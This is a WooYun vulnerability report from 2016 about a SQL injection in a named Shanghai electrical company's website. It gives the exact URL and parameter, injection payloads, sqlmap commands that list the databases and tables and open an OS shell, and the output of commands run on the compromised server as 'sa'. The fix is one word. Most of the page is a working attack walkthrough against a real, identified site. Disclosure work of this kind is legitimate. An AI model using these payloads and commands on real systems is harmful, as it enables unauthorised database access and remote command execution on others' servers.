当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0204195
漏洞标题:
上海奔腾电工网站存在SQL注射漏洞
相关厂商:
上海奔腾电工
漏洞作者:
vforbox
提交时间:
2016-05-03 17:07
修复时间:
2016-05-03 17:07
公开时间:
2016-05-03 17:07
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
7
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-05-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上海奔腾电工网站存在SQL注射漏洞,可获取sa权限,远程执行命令

详细说明:

http://pcp.povos.com.cn/
http://pcp.povos.com.cn/news_detail.jsp?id=10410
后面发现是一个虚拟机,没有继续深入

漏洞证明:

and 1=1 # 返回正常
and 1=2 # 返回不正常
1. 可多语句查询注入
2. 布尔型注入
放sqlmap跑

---
sqlmap -u "http://pcp.povos.com.cn/news_detail.jsp?id=10410" --batch --current-user --dbs  -D pcpside --tables --time-sec 3
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=10058 AND 6032=6032
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=10058;WAITFOR DELAY '0:0:5'--
---
[21:18:42] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
current user:    'sa'
available databases [6]:
[*] master
[*] model
[*] msdb
[*] MsReport
[*] pcpside
[*] tempdb
Database: pcpside
[36 tables]
+------------------+
| BBS_Cate         |
| BBS_arrest       |
| D99_CMD          |
| D99_REG          |
| D99_Tmp          |
| WCRTEMP00001     |
| WCRTEMP00002     |
| bbsmenu          |
| bbstitle         |
| clubuser         |
| config           |
| dtproperties     |
| kill_kk          |
| r3dm0v3_sql      |
| sms              |
| sqlmapfile       |
| sqlmapoutput     |
| t_6s             |
| t_6s_class       |
| t_career         |
| t_culture        |
| t_download       |
| t_download_class |
| t_hr             |
| t_hr_class       |
| t_jiaozhu        |
| t_ly             |
| t_ly_class       |
| t_news           |
| t_news_class     |
| t_notice         |
| t_notice_class   |
| t_product        |
| t_product_class  |
| t_user           |
| t_verify         |
+------------------+


sqlmap -u "http://pcp.povos.com.cn/news_detail.jsp?id=10410" --batch --os-shell
os-shell> ipconfig
Windows IP Configuration
Ethernet adapter 本地连接 6:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.10.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.10.254
   
os-shell> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Acronis Agent User       Administrator
Guest
SUPPORT_388945a0  
       
命令运行完毕。


修复方案:

过滤

版权声明:转载请注明来源 vforbox@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝